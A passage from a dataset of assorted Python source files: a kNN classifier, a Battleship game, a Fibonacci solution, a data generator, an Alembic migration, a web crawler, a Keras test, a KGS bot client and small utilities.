float(validation_vector[i]))**2)\n distance = math.sqrt(distance)\n # print(each_vector[10])\n\n # sortDistanceList.extend(distance)\n # sortDistanceList.extend(each_vector[0])\n # sortDistanceList.extend(each_vector[10])\n\n # new_vector.append(sortDistanceList)\n\n # ----------- distance, id number , income --------\n new_vector = [distance, each_vector[0], each_vector[10]]\n\n sortDistanceList.append(new_vector)\n sortDistanceList.sort()\n # counting of income references for voting\n k_result = 0\n k_income = 0\n for vote in range(k):\n if(int(sortDistanceList[vote][2]) == 1):\n k_income += 1\n # actual decision according k\n k_result = float(k_income/k)\n if (k_result > 0.5):\n return 1\n elif (k_result < 0.5):\n return 0\n else:\n return 1\n\n\n# validation testing loop\ndef validation_loop(k, train_dataSet, validation_dataSet):\n kNN_temp = []\n kNN_result = []\n for validation_vector in validation_dataSet:\n decision = kNN_decision(k,train_dataSet,validation_vector)\n kNN_temp = [decision,validation_vector[10]]\n kNN_result.append(kNN_temp)\n \n err_score = 0\n total = 0\n i = 0\n\n # print(kNN_result)\n\n for row in kNN_result:\n # print(row)\n if ((row[0]+row[1]) == 1):\n err_score = err_score + 1\n\n # print(\"error_score :: \" + str(err_score))\n i = i + 1\n total = total + 1\n\n # Data Accuracy\n return (int(100)*float(1-(float(err_score/total)))) \n\n######################## Main ####################################\n## - if argument 1 is '-v' then\noption = sys.argv[1]\nif (option == \"-v\"):\n trainFile = sys.argv[2]\n train_data = getRows(trainFile)\n vector_train = get_vector(train_data,1)\n # vector_test = get_vector(test_data,0)\n random.shuffle(vector_train)\n\n validating_vectorSet = []\n folded_vectorSet = []\n\n numFold = 4\n nVector = int(8000/numFold)\n sum_accuracy = 0\n for curF in range(numFold): ## - it's for iterating of validation test with different fold\n validating_vectorSet = []\n folded_vectorSet = []\n for i in range(numFold): ## - it's for copy data set of folded data into test tray\n if(curF == i):\n validating_vectorSet.extend(vector_train[i*nVector:(i+1)*nVector])\n else:\n folded_vectorSet.extend(vector_train[i*nVector:(i+1)*nVector])\n print(\"validating vector set: \" + str(curF))\n print(\"the other folding vector set will be TrainSet\")\n\t ### testing under variable k \n\t #max_k = 100\n\t #i = 0\n\t #### testing fixed k\n i = 1\n\t ######\n\t #for i in range(max_k):\n k = 2*i+1\n accuracy_result = validation_loop(k, folded_vectorSet, validating_vectorSet)\n print(\"test result K = \" + str(k),end=\"\\n\")\n print(\" accuracy = \" + str(accuracy_result),end=\"%\\n\")\n sum_accuracy += accuracy_result\n print(\"---- toal everage: \"+ str(sum_accuracy) + \"/\" + str(numFold) + \"=\" + str(sum_accuracy/numFold),end=\"%\\n\")\n## - else argment 1 is '-t' then\nelif (option == \"-t\"):\n trainFile = sys.argv[2]\n testFile = sys.argv[3]\n train_data = getRows(trainFile)\n test_data = getRows(testFile)\n\n vector_train = get_vector(train_data,1)\n vector_test = get_vector(test_data,0)\n random.shuffle(vector_train)\n f = open(\"kaggle_submit.csv\",\"w\")\n f.write(\"id\" + ',' + \"income\" + '\\n')\n\n print(\"id income\",end=\"\\n\")\n nTestVector = 2000\n k = 99\n\n for each_vector in vector_test:\n decision = kNN_decision(k,vector_train,each_vector)\n f.write(str(each_vector[0]) + ',' + str(decision) + '\\n')\n print(str(each_vector[0]) + \" \" + str(decision),end=\"\\n\")\n\n f.close()\n\nelse:\n print(\"------------------------------------------\")\n print(\"- usage : cmd -v/-t traindata [test_data] \")\n print(\"------------------------------------------\")\n\n\n\n#### the end of code","sub_path":"Assignment1/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":9156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"230261664","text":"#!/usr/bin/python3\n\n'''\nAuthor: Michel Zaal\nName: Battleship CLI version\nDescription: Simple CLI version of\n the game Battleship\n'''\n\nfrom random import randint\n\nboard = []\n\nfor x in range(5):\n board.append(['O'] * 5)\n\n\ndef print_board(board):\n for row in board:\n print(\" \".join(row))\n\n\nprint(\"Let's play Battleship!\\n\")\nprint_board(board)\n\n\ndef random_row(board):\n return randint(0, len(board) - 1)\n\n\ndef random_col(board):\n return randint(0, len(board[0]) - 1)\n\n\nship_row = random_row(board)\nship_col = random_col(board)\nprint()\n# print(ship_row)\n# print(ship_col)\n\n\ndef gues(type):\n try:\n _gues = int(input(f'Guess {type}:'))\n except ValueError:\n _gues = 0\n print('Try again')\n gues(type)\n return int(_gues)\n\n\nfor i in range(5):\n guess_row = gues('Row')\n guess_col = gues('col')\n\n if guess_row == ship_row and guess_col == ship_col:\n print(\"\\nCongratulations! You sunk my battleship!\")\n break\n else:\n if (0 < guess_row > 4) or (0 < guess_col > 4):\n print(\"Oops, that's not even in the ocean.\")\n elif(board[guess_row][guess_col] == \"X\"):\n print(\"You guessed that one already.\")\n else:\n print(\"You missed my battleship!\")\n board[guess_row][guess_col] = 'X'\n print_board(board)\n\ninput('\\ngame Over')\n","sub_path":"Applications/BattleShip/battleship.py","file_name":"battleship.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"286626412","text":"# Title / Difficulty\n# 피보나치 수 / Bronze Ⅲ\n\nimport sys\nfrom util import DatetimeDecorator\n\ninput: () = lambda: sys.stdin.readline().strip()\n\n\n@DatetimeDecorator\ndef solution(n):\n cache = [0, 1, 1] + [0 for _ in range(n - 2)]\n\n for i in range(3, n + 1):\n cache[i] = cache[i - 1] + cache[i - 2]\n\n return cache[n]\n\n\nn = int(input())\nresult = solution(n)\nprint(result)\n","sub_path":"Days/2020.08.05/boj_2747_피보나치_수.py","file_name":"boj_2747_피보나치_수.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"574547118","text":"\"\"\"generowanie statkow do pliku\"\"\"\n\nimport random\n\nlista_statkow = []\n\nfor i in range(200):\n temp_id_ship = \"\"\n if i < 10:\n temp_id_ship = \"S00\"+str(i)\n elif i < 100:\n temp_id_ship = \"S0\"+str(i)\n else:\n temp_id_ship = \"S\"+str(i)\n\n #generowanie wymiarow dla statku\n\n w = random.randrange(50, 101)\n l = random.randrange(50, 101)\n h = random.randrange(50, 101)\n\n statek = {\n \"id_ship\": temp_id_ship,\n \"width_ship\": w,\n \"height_ship\": h,\n \"length_ship\": l,\n }\n\n lista_statkow.append(statek)\n\n\nprint(lista_statkow)\n\nplik = open(\"statki.txt\", 'w')\ntry:\n #plik.writelines(str(lista_statkow))\n\n for i in lista_statkow:\n plik.writelines(str(i) + '\\n')\n\n\n\nfinally:\n plik.close()\n\n\n\"\"\"generowanie kontenerow do pliku\"\"\"\n\n\nlista_kontenerow = []\n\n#generowanie wysokosci dla kontenerow\nh = random.randrange(1, 41)\n\nfor i in range(1000):\n temp_id_container = \"\"\n if i < 10:\n temp_id_container = \"C00\"+str(i)\n elif i < 100:\n temp_id_container = \"C0\"+str(i)\n else:\n temp_id_container = \"C\"+str(i)\n\n #generowanie wymiarow dla kontenerow\n\n w = random.randrange(1, 41)\n l = random.randrange(1, 41)\n\n kontener = {\n \"id_container\": temp_id_container,\n \"width_container\": w,\n \"height_container\": h,\n \"length_container\": l,\n }\n\n lista_kontenerow.append(kontener)\n\n\nprint(lista_kontenerow)\n\nplik = open(\"kontenery.txt\", 'w')\ntry:\n #plik.write(str(lista_kontenerow) + '\\n')\n for i in lista_kontenerow:\n plik.writelines(str(i) + '\\n')\nfinally:\n plik.close()","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"645658334","text":"\"\"\"empty message\n\nRevision ID: 41bc1a3d3957\nRevises: adefb3c0e94e\nCreate Date: 2020-01-17 09:38:05.709944\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '41bc1a3d3957'\ndown_revision = 'adefb3c0e94e'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('sports',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('player_id', sa.Integer(), nullable=False),\n sa.Column('tennis', sa.Boolean(), nullable=False),\n sa.Column('tennis_ability', sa.String(length=20), nullable=False),\n sa.Column('squash', sa.Boolean(), nullable=False),\n sa.Column('squash_ability', sa.String(length=20), nullable=False),\n sa.Column('table_tennis', sa.Boolean(), nullable=False),\n sa.Column('table_tennis_ability', sa.String(length=20), nullable=False),\n sa.Column('badminton', sa.Boolean(), nullable=False),\n sa.Column('badminton_ability', sa.String(length=20), nullable=False),\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('modified_at', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['player_id'], ['players.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('player_id')\n )\n op.create_unique_constraint(None, 'photos', ['user_id'])\n op.alter_column('players', 'ability',\n existing_type=sa.VARCHAR(length=50),\n nullable=True)\n op.alter_column('players', 'dob',\n existing_type=sa.DATE(),\n nullable=True)\n op.alter_column('players', 'gender',\n existing_type=sa.VARCHAR(length=50),\n nullable=True)\n op.alter_column('players', 'rank_points',\n existing_type=sa.INTEGER(),\n nullable=True)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('players', 'rank_points',\n existing_type=sa.INTEGER(),\n nullable=False)\n op.alter_column('players', 'gender',\n existing_type=sa.VARCHAR(length=50),\n nullable=False)\n op.alter_column('players', 'dob',\n existing_type=sa.DATE(),\n nullable=False)\n op.alter_column('players', 'ability',\n existing_type=sa.VARCHAR(length=50),\n nullable=False)\n op.drop_constraint(None, 'photos', type_='unique')\n op.drop_table('sports')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/41bc1a3d3957_.py","file_name":"41bc1a3d3957_.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"525373973","text":"# **************************************************************************** #\n# #\n# ::: :::::::: #\n# recipe.py :+: :+: :+: #\n# +:+ +:+ +:+ #\n# By: eduriez +#+ +:+ +#+ #\n# +#+#+#+#+#+ +#+ #\n# Created: 2020/03/10 10:34:18 by eduriez #+# #+# #\n# Updated: 2020/03/10 12:08:44 by eduriez ### ########.fr #\n# #\n# **************************************************************************** #\n\nclass Recipe:\n\tdef __init__(self, name, cooking_lvl, cooking_time,\\\n\t\t\t\tingredients, description, recipe_type):\n\t\tif type(name) != str or not name:\n\t\t\traise Exception(\"name is required.\")\n\t\tif type(cooking_lvl) != int or type(cooking_time) != int:\n\t\t\traise Exception(\"cooking_lvl and cooking_time must be integers.\")\n\t\tif cooking_lvl < 1 or cooking_lvl > 5:\n\t\t\traise Exception(\"cooking_lvl must be between 1 and 5.\")\n\t\tif cooking_time < 0:\n\t\t\traise Exception(\"cooking_time must be strictly positive.\")\n\t\tif any(type(ingredients) != list or (type(elem) != str or not elem for elem in ingredients)):\n\t\t\traise Exception(\"ingredients must be a non-empty string list.\")\n\t\tif type(description) != str:\n\t\t\traise Exception(\"description must be a string.\")\n\t\tif recipe_type not in ['starter', 'lunch', 'dessert']:\n\t\t\traise Exception(\"recipe_type must be : starter | lunch | dessert.\")\n\t\tself.name = name\n\t\tself.cooking_lvl = cooking_lvl\n\t\tself.cooking_time = cooking_time\n\t\tself.ingredients = ingredients\n\t\tself.description = description\n\t\tself.recipe_type = recipe_type\n\n\tdef __str__(self):\n\t\treturn f\"recipe_name: {self.name}\\n\\\ncooking_lvl: {self.cooking_lvl}\\n\\\ncooking_time: {self.cooking_time}\\n\\\ningredients: {self.ingredients}\\n\\\ndescription: {self.description}\\n\\\nrecipe_type: {self.recipe_type}\\n\"\n","sub_path":"bootcamp_python_for_ML/D01/ex00/recipe.py","file_name":"recipe.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"146712505","text":"import unittest\nfrom src.environment import Easy21\n\n\nclass TestEnvironment(unittest.TestCase):\n def setUp(self):\n self.env = Easy21()\n\n def test_initial_step(self):\n for i in range(10000):\n d_H, p_H = self.env.initial_step()\n self.assertLessEqual(d_H, 10)\n self.assertLessEqual(p_H, 10)\n self.assertGreaterEqual(d_H, 1)\n self.assertGreaterEqual(p_H, 1)\n\n def test_move(self):\n s = self.env.initial_step()\n s, r = self.env.step(\"hit\")\n self.assertListEqual(s, self.env._cur_state)\n\n def test_get_reward(self):\n\n d_H, p_H = 5, 5\n reward = self.env._get_reward(d_H, p_H)\n self.assertEqual(reward, 0)\n\n d_H, p_H = 22, 5\n reward = self.env._get_reward(d_H, p_H)\n self.assertEqual(reward, 1)\n\n d_H, p_H = 5, 22\n reward = self.env._get_reward(d_H, p_H)\n self.assertEqual(reward, -1)\n","sub_path":"test/test_environment.py","file_name":"test_environment.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"102387376","text":"import os\n\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nAPI_ID = os.getenv('API_ID')\nAPI_HASH = os.getenv('API_HASH')\nBOT_TOKEN = os.getenv('BOT_TOKEN')\nTRANSLATION_SERVICE = os.getenv('TRANSLATION_SERVICE')\nDETECTION_SERVICE = os.getenv('DETECTION_SERVICE')\nGOOGLE_API_KEY = os.getenv('GOOGLE_API_KEY')\nYANDEX_API_TOKEN = os.getenv('YANDEX_TOKEN')\nYANDEX_FOLDER_ID = os.getenv('YANDEX_FOLDER_ID')\nDATABASE_URL = os.getenv('DATABASE_URL')\nIS_ADD_TO_DICTIONARY = os.getenv('IS_ADD_TO_DICTIONARY')\nABBYY_API_KEY = os.getenv('ABBYY_API_KEY')\nABBYY_API_TOKEN = ''\nIS_NEED_TO_REFRESH_ABBYY_API_TOKEN = os.getenv('IS_NEED_TO_REFRESH_ABBYY_API_TOKEN')\nSECOND_BEFORE_REFRESH_TOKEN = os.getenv('SECOND_BEFORE_REFRESH_TOKEN')\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"298645726","text":"# !/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport re\nimport requests\n\n\ndef crawl(start_url):\n base_url='http://so.gushiwen.org'\n\n req_headers={\n 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'\n }\n\n res=requests.get(start_url,headers=req_headers)\n if res.status_code==requests.codes.ok:\n html=res.text\n\n # 获取所有诗的链接\n parttern_href=re.compile(r'
    ',flags=re.DOTALL)\n hrefs=re.findall(parttern_href,html)\n\n # 获取每一首诗的内容,并保存到本地\n with open('data/唐诗300首.txt',mode='a',encoding='utf-8') as f:\n for href in hrefs:\n href=base_url+href\n res=requests.get(href,headers=req_headers)\n if res.status_code == requests.codes.ok:\n html = res.text\n # 标题\n parttern_title = re.compile(r'
    .*?

    (.*?)

    ', re.DOTALL)\n title=re.search(parttern_title,html).group(1)\n # 朝代\n parttern_dynasty = re.compile(r'
    .*?

    (.*?):.*?

    ', re.DOTALL)\n dynasty=re.search(parttern_dynasty,html).group(1)\n # 诗人\n parttern_author = re.compile(r'
    .*?

    .*?:(.*?)

    ', re.DOTALL)\n author=re.search(parttern_author,html).group(1)\n # 内容\n parttern_content = re.compile(r'
    .*?
    (.*?)
    ', re.DOTALL)\n content=re.search(parttern_content,html).group(1)\n content=re.sub(r'
    ','\\n',content)\n content=re.sub(r'

    ','',content)\n content=re.sub(r'

    ','',content)\n\n print('正在获取 {title}'.format(title=title))\n f.write('{title}\\n{dynasty}:{author}\\n{content}\\n'.format(title=title,dynasty=dynasty,author=author,content=content))\n\n\"\"\"\n
    \n
    \n\"赏析\"\n\"注释\"\n\"译文\"\n\n\n\n
    \n

    行宫

    \n

    唐代元稹

    \n
    \n寥落古行宫,宫花寂寞红。
    白头宫女在,闲坐说玄宗。\n
    \n
    \n\"\"\"\n\n\n\nif __name__ == '__main__':\n start_url='http://so.gushiwen.org/gushi/tangshi.aspx'\n crawl(start_url)\n","sub_path":"02_PC端/古诗文网 - 唐诗300首爬虫.py","file_name":"古诗文网 - 唐诗300首爬虫.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"80584630","text":"from quantz.strategy.ff.ff_base import *\nimport numpy as np\n\n\nclass CrossbarFF(BaseFF):\n def __init__(self, container):\n super().__init__(container)\n\n def _get_reward(self, transcation_list, debug):\n \"\"\"\n\n :param transcation_list: object\n object contains at least two properties: op_arr and price_arr\n :param debug:boolean\n :return: double\n a fitness score\n \"\"\"\n op_arr = transcation_list[\"op_arr\"]\n price_arr = transcation_list[\"price_arr\"]\n profit_arr = self._get_profit_by_op(op_arr, price_arr)\n fitness = np.sum(profit_arr)\n\n return fitness\n","sub_path":"quantz/strategy/ff/ff.py","file_name":"ff.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"222352853","text":"\"\"\"Definition of the Experts Event content type\n\"\"\"\n\nfrom zope.interface import implements\n\nfrom Products.Archetypes import atapi\nfrom Products.ATContentTypes.content import base\nfrom Products.ATContentTypes.content import schemata\n\n# -*- Message Factory Imported Here -*-\nfrom experts.product import productMessageFactory as _\n\nfrom experts.product.interfaces import IExpertsEvent\nfrom experts.product.config import PROJECTNAME\n\nExpertsEventSchema = schemata.ATContentTypeSchema.copy() + atapi.Schema((\n\n # -*- Your Archetypes field definitions here ... -*-\n\n atapi.StringField(\n 'venue',\n storage=atapi.AnnotationStorage(),\n widget=atapi.StringWidget(\n label=_(u\"Location\"),\n description=_(u\"Town and country\"),\n ),\n ),\n\n\n atapi.StringField(\n 'location',\n storage=atapi.AnnotationStorage(),\n widget=atapi.StringWidget(\n label=_(u\"Location\"),\n description=_(u\"Town and country\"),\n ),\n ),\n\n\n atapi.DateTimeField(\n 'startdate',\n storage=atapi.AnnotationStorage(),\n widget=atapi.CalendarWidget(\n label=_(u\"Start Date\"),\n description=_(u\"\"),\n ),\n validators=('isValidDate'),\n ),\n\n\n atapi.DateTimeField(\n 'enddate',\n storage=atapi.AnnotationStorage(),\n widget=atapi.CalendarWidget(\n label=_(u\"End Date\"),\n description=_(u\"\"),\n ),\n validators=('isValidDate'),\n ),\n\n\n atapi.StringField(\n 'eventtype',\n storage=atapi.AnnotationStorage(),\n widget=atapi.StringWidget(\n label=_(u\"Event Type\"),\n description=_(u\"Workshop/Conference/Training/Meeting\"),\n ),\n ),\n\n\n atapi.StringField(\n 'project',\n storage=atapi.AnnotationStorage(),\n widget=atapi.StringWidget(\n label=_(u\"Project / Programme\"),\n description=_(u\"\"),\n ),\n ),\n\n\n atapi.TextField(\n 'partners',\n storage=atapi.AnnotationStorage(),\n widget=atapi.TextAreaWidget(\n label=_(u\"Partners\"),\n description=_(u\"\"),\n ),\n ),\n\n\n atapi.StringField(\n 'location',\n storage=atapi.AnnotationStorage(),\n widget=atapi.StringWidget(\n label=_(u\"Location\"),\n description=_(u\"Town and Country\"),\n ),\n ),\n\n\n atapi.TextField(\n 'organizers',\n storage=atapi.AnnotationStorage(),\n widget=atapi.TextAreaWidget(\n label=_(u\"Organizer(s)\"),\n description=_(u\"\"),\n ),\n ),\n\n\n atapi.TextField(\n 'contact',\n storage=atapi.AnnotationStorage(),\n widget=atapi.TextAreaWidget(\n label=_(u\"Contact\"),\n description=_(u\"\"),\n ),\n ),\n\n\n atapi.StringField(\n 'url',\n storage=atapi.AnnotationStorage(),\n widget=atapi.StringWidget(\n label=_(u\"URL\"),\n description=_(u\"\"),\n ),\n ),\n\n\n))\n\n# Set storage on fields copied from ATContentTypeSchema, making sure\n# they work well with the python bridge properties.\n\nExpertsEventSchema['title'].storage = atapi.AnnotationStorage()\nExpertsEventSchema['description'].storage = atapi.AnnotationStorage()\n\nschemata.finalizeATCTSchema(ExpertsEventSchema, moveDiscussion=False)\n\n\nclass ExpertsEvent(base.ATCTContent):\n \"\"\"Sweetpotato experts event\"\"\"\n implements(IExpertsEvent)\n\n meta_type = \"ExpertsEvent\"\n schema = ExpertsEventSchema\n\n title = atapi.ATFieldProperty('title')\n description = atapi.ATFieldProperty('description')\n\n # -*- Your ATSchema to Python Property Bridges Here ... -*-\n venue = atapi.ATFieldProperty('venue')\n\n location = atapi.ATFieldProperty('location')\n\n startdate = atapi.ATFieldProperty('startdate')\n\n enddate = atapi.ATFieldProperty('enddate')\n\n eventtype = atapi.ATFieldProperty('eventtype')\n\n project = atapi.ATFieldProperty('project')\n\n partners = atapi.ATFieldProperty('partners')\n\n location = atapi.ATFieldProperty('location')\n\n organizers = atapi.ATFieldProperty('organizers')\n\n contact = atapi.ATFieldProperty('contact')\n\n url = atapi.ATFieldProperty('url')\n\n schema.moveField('venue',after = 'partners')\n\natapi.registerType(ExpertsEvent, PROJECTNAME)\n","sub_path":"experts.product/experts/product/content/expertsevent.py","file_name":"expertsevent.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"216944185","text":"# load json and create model\nfrom tensorflow.python.keras.models import model_from_json\nfrom sklearn.metrics import classification_report\nfrom numpy import load\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n\ndata = load(\"PestData_Train.npz\")\nX, y = data['arr_0'],data['arr_1']\n\nprint(X.shape)\nprint(y.shape)\n\nX = np.array(X)\ny = np.array(y)\n# Normalizing X values between 0 to 1.\nX = X.astype('float32')\nX /= np.max(X)\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=36)\n\njson_file = open('CNN_model.json', 'r')\nloaded_model_json = json_file.read()\njson_file.close()\nmodel = model_from_json(loaded_model_json)\n# load weights into new model\nmodel.load_weights(\"CNN_weights.h5\")\nprint(\"Loaded model from disk\")\n\n# evaluate loaded model on test data\nmodel.compile(loss='binary_crossentropy',\n optimizer='rmsprop',\n metrics=['accuracy'])\n\nprint(\"Test data\")\nscore = model.evaluate(X_test, y_test, verbose=1)\nprint(\"%s: %.2f%%\" % (model.metrics_names[1], score[1]*100))\n\ny_preds = model.predict(X_test, verbose=1)\nprint(y_preds.shape)\n\nprint(y_preds[:10])\n\npreds = model.predict_classes(X_test, verbose=1)\nprint(preds.shape)\n\nprint(\"Actual healthy: \",len(y_test[y_test == 1]))\nprint(\"Predicted healthy: \",len(preds[preds == 1]))\n\nprint(classification_report(y_test, preds, target_names=['Non-healthy', 'Healthy']))\n","sub_path":"CNN_test.py","file_name":"CNN_test.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"78452575","text":"import json\nimport time\nimport requests\n\nfrom .messages import *\nimport kgs\n\n\nclass KgsConnection:\n \"\"\"\n Creates a connection to KGS.\n \"\"\"\n\n MAX_TIME_INACTIVITY = 10\n\n def __init__(self, url, user):\n self._url = url\n self._user = user\n self._message_queue = list()\n self._message_callbacks = None\n self._cookies = None\n self._keep_alive = True\n\n self._formatter = MessageFormatter()\n self._message_factory = MessageFactory()\n\n self.init_sequence()\n\n def init_sequence(self):\n \"\"\"\n Perform the initialization sequence with the servlet.\n\n Basically, we perform the following operations:\n\n * Send LOGIN message for logging in\n * Immediately receive response to confirm data is OK\n \"\"\"\n\n login_response = self._send_message(LoginMessage('OSRBot', ''))\n\n self._cookies = login_response.cookies # NOM NOM NOM\n hello_received = False\n\n while not hello_received:\n response = requests.get(self._url, cookies=self._cookies)\n kgs_response = KgsResponse(self._message_factory, bytes.decode(response.content))\n\n if response.ok:\n for message in kgs_response.messages:\n if type(message) is HelloMessage:\n hello_received = True\n\n def loop(self):\n \"\"\"\n Send queued messages and receive server responses.\n :return: bool\n \"\"\"\n\n sleep_time = 0\n\n # Send queued messages\n while self._has_messages_to_process():\n time.sleep(1) # Don't hammer the server, civility is key here, folks.\n message = self._dequeue_message()\n\n if message is None:\n sleep_time += 1\n if sleep_time > self.MAX_TIME_INACTIVITY:\n # Add a WAKE_UP message so don't appear as idle\n self.queue_message(WakeUpMessage())\n else:\n sleep_time = 0\n response = self._send_message(message)\n for callback in self._message_callbacks:\n # TODO send something less stupid than an HttpResponse\n callback(response)\n\n # TODO : find some way to\n return self._keep_alive\n\n def _has_messages_to_process(self):\n \"\"\"\n Check if there are any messages left to send.\n :return: True if any message remains in the queue.\n \"\"\"\n return len(self._message_queue) > 0\n\n def queue_message(self, message):\n \"\"\"\n Add a message to the queue.\n\n Messages should definitely NOT be sent directly through _send_message: the frequency by which we send messages\n should be controlled since the KGS server does not like being spammed (and who does, really?)\n \"\"\"\n if message is not Message:\n raise ValueError(\"Not a Message\")\n\n self._message_queue.append(message)\n\n def _dequeue_message(self):\n \"\"\"\n Remove a message from the queue and return it.\n :return: A Message object if any messages are left in the queue; None if no message remains.\n \"\"\"\n if len(self._message_queue) > 0:\n return self._message_queue.pop()\n\n return None\n\n def _is_processable(self, message):\n \"\"\"\n Tells if a given message type will be processed or not. A message is \"processable\" if at least one callback was\n given for it.\n :param message: Message object\n :return: True if at least one callback can be performed on that message type.\n \"\"\"\n return isinstance(message, Message)\\\n and message.message_type in self._message_callbacks.keys()\\\n and self._message_callbacks[message.message_type].count() > 0\n\n def add_message_callback(self, message_type, callback):\n \"\"\"\n Add a callback for a given message type response.\n\n :param message_type: Message type (eg. HELLO, LOGIN, etc.)\n :param callback: Callable to call with the message when we get a response.\n \"\"\"\n if not callable(callback):\n raise ValueError(\"Callback must be a callable\")\n elif not isinstance(message_type, str):\n raise ValueError(\"Message type must be a string\")\n elif message_type not in Message.supported_types:\n raise ValueError(\"Message type is not supported, your pull requests are welcome\")\n\n # Message isn't processable yet, add it to the dict of messages\n if message_type not in self._message_callbacks.keys():\n self._message_callbacks[message_type] = list()\n\n # Add the callback for that message\n self._message_callbacks[message_type].append(callback)\n\n def remove_message_callback(self, message_type, callback):\n \"\"\"\n Remove a callback for a given message type response.\n\n :param message_type: Message type (eg. HELLO, LOGIN, etc.)\n :param callback: Callable to call with the message when we get a response.\n \"\"\"\n if message_type not in self._message_callbacks:\n raise ValueError(\"No callbacks set for message \" + message_type)\n elif callback not in self._message_callbacks[message_type]:\n raise ValueError(\"Callback not found in \" + message_type)\n\n lst = self._message_callbacks[message_type]\n index = lst.index(callback)\n del lst[index]\n\n def _get_messages(self):\n return requests.get(self._url, '')\n\n def _send_message(self, message):\n \"\"\"\n Private method. Send a message to the server.\n :param message: PostMessage object. Send a message to the server.\n :return: HttpResponse\n \"\"\"\n\n if message is not Message:\n raise ValueError(\"Not a Message object\")\n\n # Why would you perform a callback that will not be processed?\n if not self._is_processable(message.message_type):\n return\n\n formatted_message = self._formatter.format_message(message)\n\n if message.action == 'POST':\n headers = {\"content-type\": \"application/json;charset=UTF-8\"}\n response = requests.post(self._url, json=formatted_message, headers=headers)\n elif message.action == 'GET':\n response = requests.get(self._url, formatted_message)\n else:\n raise ValueError(\"Invalid action for message\")\n\n return response\n\n def close(self):\n \"\"\"\n Close the connection properly.\n \"\"\"\n\n self._send_message(LogoutPostMessage())\n self._keep_alive = False\n self._cookies = None\n\n\nclass KgsResponse:\n \"\"\"\n A response from the server (or rather, the servlet). It is simply a JSON object containing an array of messages that\n will need to be parsed and made into proper Message objects.\n \"\"\"\n\n def __init__(self, message_factory, data):\n self._messages = list()\n self._message_factory = message_factory\n\n self.parse_messages(data)\n\n @property\n def messages(self):\n return self._messages\n\n def parse_messages(self, data):\n for message_dict in json.loads(data)['messages']:\n self._messages.append(self.create_message(message_dict))\n\n def create_message(self, message_dict):\n return self._message_factory.create_message(message_dict)\n\n\n# TODO : Running as standalone to test stuff, remove this ASAP\nif __name__ == '__main__':\n # TODO : create setting for actual URL\n bot = kgs.types.user.User()\n\n connection = KgsConnection('http://localhost:8080/jsonClient/access')\n\n while connection.loop():\n pass\n\n connection.close() # kthxbye\n","sub_path":"server/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":7700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"571198906","text":"import http.server\r\nimport socketserver\r\nimport logging\r\nimport cgi\r\n\r\nimport sys\r\n\r\ndef faqPY(text):\r\n print(text)####\r\n readFile=open(\"faq.xml\", \"r\")#Opens current XML doc to be read\r\n #_______________________________________________________________\r\n #faqText = text.getvalue(\"text\")\r\n\t#faqAnswer = text.getvalue(\"answer\")\r\n #_______________________________________________________________\r\n xmlContent = readFile.readlines()#xmlContent is list of file's current contents\r\n string = \"\"\r\n xmlString = string.join(xmlContent)\r\n #_______________________________________________________________\r\n replaceXML = xmlString.replace(\"......\",\"\\n\"+text[1]+\"\\n...\\n\"+\r\n\t\t\t\t\t\t\t\t \"\\n......\")\r\n #^Replaces empty contact element with Http data__________________\r\n #^Fully converted and replaced XML with new elements to be written in file^\r\n #________________________________________________________________\r\n readFile.close()#~~~~~Closed XML file, no longer reading\r\n print(replaceXML)\r\n writeFile=open(\"faq.xml\", \"w\")#Re-Opens XML file in to write\r\n writeFile.write(replaceXML)\r\n writeFile.close()#Closed XML file, no longer writing\r\n 